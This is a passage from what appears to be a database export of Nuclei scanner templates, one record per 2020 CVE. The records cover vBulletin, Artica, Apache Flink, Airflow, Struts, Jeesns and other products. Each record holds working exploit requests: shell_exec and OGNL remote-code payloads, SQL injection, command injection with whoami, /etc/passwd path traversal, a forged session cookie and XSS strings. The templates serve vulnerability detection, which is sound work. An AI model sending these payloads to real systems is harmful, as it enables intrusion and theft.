490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950", "hash": "4bbb1ea6f9d7663d2a52ea5c97664100", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a9" }, "name": "CVE-2020-17496.yaml", "content": "id: CVE-2020-17496\n\ninfo:\n name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution\n author: pussycat0x\n severity: critical\n description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade vBulletin to a version that is not affected by CVE-2020-17496.\n reference:\n - https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17496\n - https://seclists.org/fulldisclosure/2020/Aug/5\n - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch\n - https://cwe.mitre.org/data/definitions/78.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17496\n cwe-id: CWE-74\n epss-score: 0.97451\n epss-percentile: 0.99949\n cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vbulletin\n product: vbulletin\n tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists\n\nhttp:\n - raw:\n - |\n POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206afba9382ef50078a6e10f45af89877a09050cee4ee4f09332c699c120cc20570221009ee5bdbc704e8afa38af4a3db4866cc3cae4b1bdec288b453ac41adf3db45155:922c64590222798bb761d5b6d8e72950", "hash": "4e63d157c9d22945818fbe1c8b0ee386", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081aa" }, "name": "CVE-2020-17505.yaml", "content": "id: CVE-2020-17505\n\ninfo:\n name: Artica Web Proxy 4.30 - OS Command Injection\n author: dwisiswant0\n severity: high\n description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17505\n - https://blog.max0x4141.com/post/artica_proxy/\n - https://github.com/sobinge/nuclei-templates\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-17505\n cwe-id: CWE-78\n epss-score: 0.96502\n epss-percentile: 0.99502\n cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: articatech\n product: web_proxy\n tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech\n\nhttp:\n - raw:\n - |\n GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"array(2)\"\n - \"Position: ||whoami||\"\n - \"root\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204bd1705a9455e6871cb3419d303ccfad65755a7bdb6286bf4d77df2f8595aa2202200abf4f4c62097d8b13842832edda25d4bf39ef1baa841854228d08fc794f7316:922c64590222798bb761d5b6d8e72950", "hash": "67dd1ca05b4e30294f741edbaf54c6e9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ab" }, "name": "CVE-2020-17506.yaml", "content": "id: CVE-2020-17506\n\ninfo:\n name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection\n author: dwisiswant0\n severity: critical\n description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506\n - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html\n - https://blog.max0x4141.com/post/artica_proxy/\n - https://github.com/hangmansROP/proof-of-concepts\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17506\n cwe-id: CWE-89\n epss-score: 0.96009\n epss-percentile: 0.99439\n cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: articatech\n product: web_proxy\n tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;\"\n\n host-redirects: true\n max-redirects: 1\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"artica-applianc\"\n\n - type: word\n part: header\n words:\n - \"PHPSESSID\"\n\n - type: status\n status:\n - 200\n - 301\n - 302\n condition: or\n\n extractors:\n - type: kval\n kval:\n - \"PHPSESSID\"\n# digest: 4a0a00473045022100f662e4c6ca11d25724a6f673e821f724e1459f0dc49dd7eccfb95ba6f10ec21302203fdd45b3e584bf02ad138c2b3ac177cb72cc83412a78f49d7a0855fe3f749bd7:922c64590222798bb761d5b6d8e72950", "hash": "3eb40e9fe1380eca5080ac17cfec1837", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ac" }, "name": "CVE-2020-17518.yaml", "content": "id: CVE-2020-17518\n\ninfo:\n name: Apache Flink 1.5.1 - Local File Inclusion\n author: pdteam\n severity: high\n description: |\n Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later).\n reference:\n - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518\n - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E\n - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E\n - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17518\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-17518\n cwe-id: CWE-22,CWE-23\n epss-score: 0.86056\n epss-percentile: 0.98301\n cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: flink\n tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive\n\nhttp:\n - raw:\n - |\n POST /jars/upload HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n ------WebKitFormBoundaryoZ8meKnrrso89R6Y\n Content-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n {{randstr}}\n ------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n - |\n GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"{{randstr}}\") && status_code == 200'\n# digest: 490a0046304402205570104598ee83206abdcb1418c3b615a3cbc4e3408dbf1e52c88c9ae2814b52022050e866d7f1f34ac958e583294080c2e7b8f99d49f90eddb2c4d855b851709e2d:922c64590222798bb761d5b6d8e72950", "hash": "99971b140e63b1f84ea5128e8ef3b824", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ad" }, "name": "CVE-2020-17519.yaml", "content": "id: CVE-2020-17519\n\ninfo:\n name: Apache Flink - Local File Inclusion\n author: pdteam\n severity: high\n description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.\n reference:\n - https://github.com/B1anda0/CVE-2020-17519\n - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E\n - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E\n - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17519\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-17519\n cwe-id: CWE-552\n epss-score: 0.97103\n epss-percentile: 0.99737\n cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: flink\n tags: cve,cve2020,apache,lfi,flink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204b890b4ec1857214ffda11340aa1a4661bbb5dc35de8a1740ccd531d92910d26022008bfdeb53b6cdc73ff693a31a0ee9b55e4aa92c53dfe39bc0349491462a4f66c:922c64590222798bb761d5b6d8e72950", "hash": "7f979e5b81b3166f9647a5b6ca390b8f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ae" }, "name": "CVE-2020-17526.yaml", "content": "id: CVE-2020-17526\n\ninfo:\n name: Apache Airflow <1.10.14 - Authentication Bypass\n author: piyushchhiroliya\n severity: high\n description: |\n Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code.\n remediation: Change default value for [webserver] secret_key config.\n reference:\n - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise\n - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E\n - http://www.openwall.com/lists/oss-security/2020/12/21/1\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17526\n - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2020-17526\n cwe-id: CWE-287\n epss-score: 0.08372\n epss-percentile: 0.93787\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: airflow\n fofa-query: Apache Airflow\n tags: cve,cve2020,apache,airflow,auth-bypass\n\nhttp:\n - raw:\n - |\n GET /admin/ HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /admin/ HTTP/1.1\n Host: {{Hostname}}\n Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains(body_1, 'Redirecting...')\"\n - \"status_code_1 == 302\"\n condition: and\n\n - type: word\n part: body_2\n words:\n - \"DAG\"\n - \"Recent Tasks\"\n - \"Users\"\n - \"SLA Misses\"\n - \"Task Instances\"\n condition: and\n# digest: 4a0a00473045022100f9b0843697463f8e60b12ec56ef0932060ae2d860b8921f95740b592f274713f022053fcc5e9356e6480fab005b56bb10b6931ef145cd764ba9a91e7b44715fcb0cb:922c64590222798bb761d5b6d8e72950", "hash": "6d1225735df356206489afa4047fde62", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081af" }, "name": "CVE-2020-17530.yaml", "content": "id: CVE-2020-17530\n\ninfo:\n name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts.\n reference:\n - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html\n - http://jvn.jp/en/jp/JVN43969166/index.html\n - https://cwiki.apache.org/confluence/display/WW/S2-061\n - https://security.netapp.com/advisory/ntap-20210115-0005/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-17530\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-17530\n cwe-id: CWE-917\n epss-score: 0.97232\n epss-percentile: 0.99826\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2020,apache,rce,struts,kev,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100fab6e8757fd37c5b780da0990fec386241d3b06313f471ca7ebe8f6a0a31b40f0220726c800f75a906c6acab6cfa704f40f77d520675350c7a3ca2efc97ed9ea7873:922c64590222798bb761d5b6d8e72950", "hash": "72c4fba954d8859b5e5a601de1dd99e3", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b0" }, "name": "CVE-2020-18268.yaml", "content": "id: CVE-2020-18268\n\ninfo:\n name: Z-Blog <=1.5.2 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.\n remediation: |\n Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability.\n reference:\n - https://github.com/zblogcn/zblogphp/issues/216\n - https://github.com/zblogcn/zblogphp/issues/209\n - https://nvd.nist.gov/vuln/detail/CVE-2020-18268\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-18268\n cwe-id: CWE-601\n epss-score: 0.00147\n epss-percentile: 0.49792\n cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zblogcn\n product: z-blogphp\n tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn\n\nhttp:\n - raw:\n - |\n POST /zb_system/cmd.php?act=verify HTTP/1.1\n Host: {{Hostname}}\n Content-Length: 81\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n\n btnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n - |\n GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950", "hash": "743d4674f41df01c5486ba711917f2ac", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b1" }, "name": "CVE-2020-19282.yaml", "content": "id: CVE-2020-19282\n\ninfo:\n name: Jeesns 1.4.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/zchuanzhao/jeesns/issues/11\n - https://www.seebug.org/vuldb/ssvid-97940\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19282\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19282\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47808\n cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeesns\n product: jeesns\n tags: cve2020,cve,jeesns,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200d8c3150b6b8a8c0f5c30dc6af03f5ed59f49c7172d5b9c124b0069156c4632002202f26a4fd67b93582ef66040e621eed506f3dc6444c34de7e52f2f8a70cd39ae9:922c64590222798bb761d5b6d8e72950", "hash": "e34e000b992b4241b9cfc638be88f46e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b2" }, "name": "CVE-2020-19283.yaml", "content": "id: CVE-2020-19283\n\ninfo:\n name: Jeesns 1.4.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/zchuanzhao/jeesns/issues/10\n - https://www.seebug.org/vuldb/ssvid-97939\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19283\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19283\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47808\n cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeesns\n product: jeesns\n tags: cve,cve2020,jeesns,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ce54269cc6013cc9dfacbcc071ea4ec6aeb9b2705d6dcf5d2f9933efe2f52ac60221009e908e358415d47143c5e20bb6c85ed1313738eef89b12ad1a30fca1ba8d1412:922c64590222798bb761d5b6d8e72950", "hash": "dcd88123b159f1e8b4ba72a2407522b3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b3" }, "name": "CVE-2020-19295.yaml", "content": "id: CVE-2020-19295\n\ninfo:\n name: Jeesns 1.4.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/zchuanzhao/jeesns/issues/21\n - https://www.seebug.org/vuldb/ssvid-97950\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19295\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19295\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44405\n cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeesns\n product: jeesns\n fofa-query: title=\"Jeesns\"\n tags: cve,cve2020,jeesns,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'JEESNS'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206fdeafff21f7a7f3fa290875fb004823b70c6bc687ea55c42db457447b3d104d02203827511e17f0cc818dbe25c0d09eaa34562318a78faed6b679baeafbb76c61dc:922c64590222798bb761d5b6d8e72950", "hash": "85f8629e326360cb9302db5de6ee71e6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b4" }, "name": "CVE-2020-19360.yaml", "content": "id: CVE-2020-19360\n\ninfo:\n name: FHEM 6.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: FHEM version 6.0 suffers from a local file inclusion vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.\n remediation: |\n Apply the latest patch or upgrade to a version that is not affected by the vulnerability.\n reference:\n - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md\n - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability\n - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19360\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-19360\n cwe-id: CWE-22\n epss-score: 0.05104\n epss-percentile: 0.92761\n cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fhem\n product: fhem\n tags: cve,cve2020,fhem,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d4bbb411b6f9450007b1b9edaf58699836267245aed9689e95282ebc0fdf4f59022100f73bac44bd11fc2c9c9d451ee9ba4fe317798489718c97090e5aeeafff66d668:922c64590222798bb761d5b6d8e72950", "hash": "54a71a32555f5a7713f312a71307c8cd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b5" }, "name": "CVE-2020-1943.yaml", "content": "id: CVE-2020-1943\n\ninfo:\n name: Apache OFBiz <=16.11.07 - Cross-Site Scripting\n author: pdteam\n severity: medium\n description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.\n reference:\n - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E\n - https://s.apache.org/pr5u8\n - https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2020-1943\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-1943\n cwe-id: CWE-79\n epss-score: 0.50879\n epss-percentile: 0.97475\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: ofbiz\n tags: cve2020,cve,apache,xss,ofbiz\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 